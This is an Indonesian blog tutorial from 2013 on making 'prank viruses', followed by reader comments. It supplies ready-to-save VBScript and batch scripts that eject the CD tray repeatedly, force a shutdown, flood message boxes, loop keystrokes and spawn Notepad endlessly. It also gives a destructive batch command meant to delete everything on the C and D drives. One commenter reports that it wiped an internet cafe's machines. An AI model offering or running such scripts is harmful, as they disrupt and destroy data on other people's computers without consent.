Saturday, 9 February 2013

Cara Membuat Virus Sederhana ( Jahil )


Cara Membuat Virus Sederhana ( Jahil )

Virus
Virus, nama yang sudah tidak asing buat kita, yang mungkin juga dibenci buat para pemilik komputer. Mendapatkan virus sudah biasa, tapi membuat virus?!

Kali ini saya akan memberikan tips dan trick jahil buat sobat yang penasaran, Untuk hal Resiko terima sendiri ^_^. Untuk membuat virus ini tidak membutuhkan software canggih, cukup dengan Notepad software bawaan window yang pasti sudah kita ketahui.

Berikut caranya :

1. Membuka dan menutup CD/DVD Komputer.

  • Copy script di bawah ini. 
Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

  • Save as dengan format.vbs dan jangan lupa merubah save as type dengan All File

Virus


 2. Membuat Komputer Shutdown dengan muncul pesan.

  •  Copy script di bawah ini.
    @echo off
    msg * Harap tenang komputer anda akan mati heheheheh
    shutdown -s -c “Komputer anda mati”

  • Save As dengan format .bat dan jangan lupa merubah Save As Type menjadi All File

 3. Membuat Pesan muncul berulang – ulang 

  •  Copy script di bawah ini.
@ECHO off
:Begin
msg * hahahhaa
msg * santai boss
msg * ini hanya main-main
msg * jangan marah ya
msg * hanya bercanda
GOTO BEGIN

  • Save As dengan format .bat dan jangan lupa merubah Save As Type menjadi All File 

4. Membuat Tombol Capslock terus menyala  

  • Copy script di bawah ini.
Set wshShell =wscript.CreateObject(“WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “{CAPSLOCK}” loop

  • Save As dengan format .vbs dan jangan lupa merubah Save As Type menjadi All File

5. Membuat terus – menerus menekan tombol “backspace”
  • Copy kode di bawah
MsgBox “Kembali ke menu sebelumnya” Set wshShell =wscript.CreateObject(“WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “{bs}” loop

  • Save As dengan format .vbs dan jangan lupa merubah Save As Type menjadi All File

6. Membuka notepad Terus – menerus
  • Copy kode di bawah
@ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top

  • Save As dengan format .bat dan jangan lupa merubah Save As Type menjadi All File

7. Menghapus semua Data  Tanpa Terkecuali
Untuk yang satu ini saya sarankan jangan coba-coba karena sangat mematikan dan dapat berakibat fatal

  • Copy kode di bawah
DEL C: -Y DEL D: -Y

  • Save As dengan format .bat dan jangan lupa merubah Save As Type menjadi All File

Catatan :
  • Semua script di atas akan berjalan jika sobat klik Pada file yang sobat ingin jalankan.
  • jika ada sesuatu yang terjadi jangan salahkan saya,karena saya hanya memberikan sedikit ilmu yang saya miliki.


Cara Membuat Virus Sederhana ( Jahil )

Ditulis Oleh : Nayla Mirlina ~ Art in Games

Christian angkouw Sobat sedang membaca artikel tentang Cara Membuat Virus Sederhana ( Jahil ) . Oleh Admin, Sobat diperbolehkan mengcopy paste atau menyebar-luaskan artikel ini, namun jangan lupa untuk meletakkan link dibawah ini sebagai sumbernya

:: Get this widget ! ::

+ komentar + 14 komentar

10 February 2013 at 12:02

Ok , Thanks ya ....

http://maczcandraman.blogspot.com/

Terimakasih Candra atas Komentarnya di Cara Membuat Virus Sederhana ( Jahil )
12 February 2013 at 21:01

Berbahaya kalau kelewatan :))

Terimakasih AdityaReinaldo atas Komentarnya di Cara Membuat Virus Sederhana ( Jahil )
25 February 2013 at 06:36

Cara mengembalikan nya gimana gan

Terimakasih ahmad dayguns atas Komentarnya di Cara Membuat Virus Sederhana ( Jahil )
Anonymous
28 February 2013 at 21:11

wah mantep... gan :))

Terimakasih Anonymous atas Komentarnya di Cara Membuat Virus Sederhana ( Jahil )
Anonymous
22 March 2013 at 10:05

bahaya juga nih ...
tp pake AVIRA juga hiLang kn http://www.cute-factor.com/ima
ges/smilies/onion/th_101_.gif???

Terimakasih Anonymous atas Komentarnya di Cara Membuat Virus Sederhana ( Jahil )
22 March 2013 at 12:59

@Anonymoussebenarnya saya belum coba,, :D :D

Terimakasih Arief Maulana atas Komentarnya di Cara Membuat Virus Sederhana ( Jahil )
3 April 2013 at 20:01

pake task manager juga beres

Terimakasih alanst24 atas Komentarnya di Cara Membuat Virus Sederhana ( Jahil )
Anonymous
17 April 2013 at 16:10

Mantap, izin menyebarkan blog ini gan

Terimakasih Anonymous atas Komentarnya di Cara Membuat Virus Sederhana ( Jahil )
24 April 2013 at 01:28

Bahaya gan klau ane cobak:: masak virus buatan kita .gak bisa kita kalahin.

Terimakasih Rifandi Umrah atas Komentarnya di Cara Membuat Virus Sederhana ( Jahil )
Anonymous
29 April 2013 at 22:23

di win 7 jalan gak nih script...???

Terimakasih Anonymous atas Komentarnya di Cara Membuat Virus Sederhana ( Jahil )
Anonymous
7 May 2013 at 11:00

cara keluar nya gmn kalo udah di jalanin? x(

Terimakasih Anonymous atas Komentarnya di Cara Membuat Virus Sederhana ( Jahil )
7 May 2013 at 13:59

@Anonymoushapus saja filenya, kalau gak bisa pake task manager.

Terimakasih Arief Maulana atas Komentarnya di Cara Membuat Virus Sederhana ( Jahil )
21 May 2013 at 15:15

wah gan virus yg terakhir tmen ane coba, trus di cobain ke warnet ilang semua datanya ,, untung pake deepfreze tu warnet wkwk gtw ilang gtw balik lagi
b-(

Terimakasih samsul maarif atas Komentarnya di Cara Membuat Virus Sederhana ( Jahil )
21 May 2013 at 20:46

@samsul maarifwah kejam nih agan,, tapi Deep Freze Aman kok ;))

Terimakasih Arief Maulana atas Komentarnya di Cara Membuat Virus Sederhana ( Jahil )

Post a Comment

"Terima Kasih Telah Berkunjung Ke Blog Kami, Dimohon Berkomentar Yang Bersifat Membangun Dan Jangan Lupa Juga Follow Kami yah"
"Jika Ingin menghargai postingan cukup dengan *Terima Kasih*"
"Jadilah Blogger Professional Not SPAMER"
:)) ;)) ;;) :D ;) :p :(( :) :( :X =(( :-o :-/ :-* :| 8-} :)] ~x( :-t b-( :-L x( :-q =))